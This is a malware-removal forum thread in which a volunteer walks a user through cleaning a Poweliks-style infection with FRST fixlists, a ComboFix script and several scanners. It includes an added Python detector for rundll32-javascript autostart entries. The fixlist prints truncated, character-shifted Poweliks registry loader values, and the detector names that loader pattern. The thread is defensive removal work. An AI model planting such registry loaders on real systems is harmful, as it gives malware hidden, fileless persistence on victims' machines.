Hello everyone, so today I was browsing the internet when I noticed that the sites were loading really slow. Opening folders and files saved on my computer also was taking forever. Avast kept telling me that it blocked a malicious website from Internet Explorer even though it wasn’t open. So I checked Task Manager to see if it was still running. When Task Manager loaded, there were like 10 COM Surrogates that were taking up all the resources. Every time I tried to end them, they just popped back. Now my comp and internet are very slow and I’ve gotten a few blue screens of death. MBAM didn’t find anything malicious, I just updated it also. I don’t know what to do. Any help would be greatly appreciated. I’ve attached the MBAM, FRST and Addition logs. I’ve been trying to get the aswMBR log but every time I run it, it freezes or my computer has a BSOD. I'll work on getting it.
Thanks again in advance.
Hi
Fix with Farbar Recovery Scan Tool
This fix was created for this user for use on that particular machine. Running it on another one may cause damage and render the system unstable.
- Press the Windows key + R on your keyboard at the same time. Type Notepad and click OK.
- Copy the entire content of the codebox below and paste into the Notepad document:
start
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-1130826438-1407137884-1739162223-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs-x32: c:\progra~3\browse~1\261095~1.52\{c16c1~1\browse~1.dll => "c:\progra~3\browse~1\261095~1.52\{c16c1~1\browse~1.dll" File Not Found
CustomCLSID: HKU\S-1-5-21-1130826438-1407137884-1739162223-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
EmptyTemp:
end
- Click File, Save As and type fixlist.txt as the File Name.
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!
- Right-click on the FRST icon and select Run as Administrator to start the tool.
XP users click run after receipt of Windows Security Warning - Open File.
8 users will be prompted about Windows SmartScreen protection - click More information and Run.
- Press the Fix button just once and wait.
- If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
- When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please include it in your reply.
Fix with Junkware Removal Tool
Please download JRT by Thisisu and save the file to your desktop.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.
- Right-click on the JRT icon and select Run as Administrator to start the tool.
- Follow the prompts and let this process run uninterrupted.
- This scan can take a while, depending on your System specs.
- Upon completion, a log (JRT.txt) will open on your desktop.
Please include the contents of that file in your reply.
Do not forget to re-enable your previously switched off protection software!
Please also manually reboot your machine after this procedure.
Fix with AdwCleaner
Please download AdwCleaner by Xplode and save the file to your desktop.
- Right-click on the AdwCleaner icon and select Run as Administrator to start the tool.
- The program will begin to update the database (if internet connection is operational). Please wait a little bit.
- Follow the prompts and click Scan.
- When finished, please click Clean.
- Upon completion, click Report. A log (AdwCleaner[S*].txt) will open.
Please include the contents of that file in your reply.
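As an added illustration of what the two entries marked "Poweliks" in the fixlist above represent (example code written for this thread, not part of Naathim's fix or of FRST itself): the persistence lives entirely in registry values that make rundll32.exe run JavaScript, and the eval() argument is stored with every character shifted up by one. The script below flags such autostart lines in FRST-style output and undoes the shift so an analyst can see what the value actually executes. The sample lines are constructed to mirror the page's output; only the obfuscated fragment and CLSID are the ones quoted above.

```python
import re

# Constructed sample lines in the style of the FRST fixlist quoted in this thread.
# The third line reproduces the obfuscated fragment shown on the page; the rest are
# ordinary, benign-looking entries used for contrast.
SAMPLE_FRST_LINES = [
    r'HKLM\...\Run: [SecurityHealth] => C:\Windows\system32\SecurityHealthSystray.exe',
    r'HKLM-x32\...\Run: [] => [X]',
    r'CustomCLSID: HKU\S-1-5-21-0000000000-0000000000-0000000000-1002_Classes\CLSID'
    r'\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:'
    r'"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds',
]

# A registry autostart value should never need rundll32 to run a javascript: URL;
# that combination is the fileless loader pattern these entries exhibit.
FILELESS_LOADER = re.compile(r'rundll32(\.exe)?\s+javascript:', re.IGNORECASE)
EVAL_ARGUMENT = re.compile(r'eval\("([^"]*)')


def unshift_js(fragment, shift=1):
    """Undo the per-character shift: each character was stored as chr(ord(c) + 1)."""
    return ''.join(chr(ord(c) - shift) for c in fragment)


def flag_fileless_autostarts(lines):
    """Return a list of (line_number, decoded_eval_prefix) for suspicious entries.

    decoded_eval_prefix is None when the line matches the loader pattern but
    carries no eval("...") fragment to decode (FRST truncates long values, so
    what is decoded is only the visible prefix).
    """
    findings = []
    for number, line in enumerate(lines, start=1):
        if not FILELESS_LOADER.search(line):
            continue
        match = EVAL_ARGUMENT.search(line)
        decoded = unshift_js(match.group(1)) if match else None
        findings.append((number, decoded))
    return findings


if __name__ == '__main__':
    for number, decoded in flag_fileless_autostarts(SAMPLE_FRST_LINES):
        print(f'line {number}: rundll32/javascript autostart; decoded prefix: {decoded!r}')
```

Running it prints one finding, whose decoded prefix begins with `document.write('<script language=jscr`, which is the only part the log shows before FRST truncates the value.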
First, I want to thank you Naathim for taking the time to help me. ;D
I’ve done what you said and I’ve attached the logs. My computer already is doing better. No longer takes 15 minutes to boot up
The COM surrogates also have disappeared. Thanks again.
Hi
My computer already is doing better. No longer takes 15 minutes to boot up :D The COM surrogates also have disappeared. Thanks again
I’m glad to hear that. However, we are not done yet. Please post me a fresh FRST scan results.
Scan with Farbar Recovery Scan Tool
Please re-run Farbar Recovery Scan Tool.
- Right-click on the FRST icon and select Run as Administrator to start the tool.
XP users click run after receipt of Windows Security Warning - Open File.
8 users will be prompted about Windows SmartScreen protection - click More information and Run.
- Make sure that Addition option is checked.
- Press Scan button and wait.
- The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.
Please include their content in your next reply.
Fresh FRST and Addition logs attached
Fix with ComboFix
Let’s prepare a Script for ComboFix to mark some things for being deleted.
- Press the Windows key + R on your keyboard at the same time.
- A Run window should appear in the lower left corner. Type in notepad.exe and press Enter.
- In the shown window paste in the following script:
Driver::
gaijinls
X6va015
xhunter1
File::
C:\Windows\system32\drivers\gaijinls.sys
C:\Windows\xhunter1.sys
C:\Windows\SysWOW64\Drivers\X6va015
- Go to File menu and select Save as.
- Make sure that the Save as type option is set to Text files (*.txt) and the place to save will be your desktop.
- Name the file CFScript and select Save.
Your CFScript.txt file should appear on your desktop.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.
- Now drag your CFScript file and drop it onto the ComboFix icon.
- This will start ComboFix. Let it run uninterrupted!
- A reboot may be needed during this run. Allow it.
- When finished, it shall produce a log for you at C:\ComboFix.txt and display it.
Please include that log in your next reply.
If you encounter any issues with internet connection after running ComboFix, please visit this link.
If an error about operation on the key marked for deletion appears after running the tool, please reboot your machine.
Do not forget to turn on your previously switched-off protection software!
Hey again. Here’s the ComboFix log. Thankfully there were no issues with the internet afterward.
OK, what issues remain?
Scan with Panda Cloud Cleaner
This type of scan often produces false positives. In any case do not remove on your own any of its findings! Removal will be made after the careful analysis of the scan results.
Please download Panda Cloud Cleaner and save the file to your desktop.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.
- Install the scanner by right-clicking on the Panda Cloud Cleaner icon and selecting Run as Administrator.
- It should start itself automatically after the installation.
- In the main console click Accept and Scan.
- This scan won’t take long, about several minutes (depending on your system specs). Let it run uninterrupted.
- At the last stage you will see a couple of messages about verifying & analyzing results. Wait patiently.
- Upon completion you will see the detections window. Enter one of them and click there View Report at the bottom right side.
- A notepad window named PCloudCleaner.log will open. Save it to your desktop.
Please include the contents of that file in your next reply.
Don’t forget to re-enable your switched-off protection software!
After that you may uninstall Panda Cloud Cleaner from your machine, if you wish to.
Scan with Security Check
Please download Security Check by Screen317 and save it to your desktop.
- Right-click on the Security Check icon and select Run as Administrator to start the tool.
- Follow onscreen instructions inside the black box. This scan won’t take long.
- Soon a notepad document called checkup.txt will open automatically.
Please include the content of that document.
I’m not experiencing any issues anymore. My computer and internet are running smoothly. I’ve attached the two logs. Hopefully that virus has disappeared for good
Hi
Updating Mozilla Firefox manually
- Please open Firefox.
- Click the menu icon.
- Click Help and select About Firefox.
- Firefox will search for any updates and start downloading them automatically.
- When the updates are ready you will be prompted to restart Firefox. Please do it.
Remember to keep it always updated.
Clean with DelFix
Please download DelFix by Xplode and save it to your desktop.
- Right-click on the DelFix icon and select Run as Administrator to start the tool.
- Ensure that Remove disinfection tools, Purge system restore and Reset system settings are checked.
- Push Run.
- When finished, it will display a notepad report.
Include it for my review.
Please also manually reboot your machine after posting your logfile.
Sorry for the wait. FireFox is now up to date. I’ve attached the logfile and will reboot as soon as this gets posted
Subject to no further problems, I think that you are ready to go
Below you will find my thoughts about securing your machine. Go ahead through it, you will benefit from some useful advice about safe computing.
Recommended reading:
MUST READ - security tips: Computer Security - a short guide to staying safer online.
MUST READ - general maintenance: What to do if your Computer is running slowly?
Recommended additional software:
- TFC - to clean unneeded temporary files.
- Malwarebytes’ Anti-Malware - to scan your system from time to time in search for malware.
- Malwarebytes’ Anti-Exploit - to prevent plenty of mostly exploited vulnerabilities.
- McShield - to prevent infections spread by removable media.
- CryptoPrevent - to secure yourself from the very severe CryptoLocker infection.
- Unchecky - to prevent installing additional foistware bundled with legitimate installations.
My help is always free, but if you are happy with the help provided and wish to help my fight against malware, please consider making a donation.
All donations are to refund a new HDD to replace the old one, which recently passed away!
Now if you have any other questions, feel free to ask me. Otherwise simply acknowledge my recommendations and this topic will be closed.
Stay safe,
Naat
Thank you very much for all your help! I will try to stay safer on the web. Appreciate everything, keep up the awesome work. ;D
You’re welcome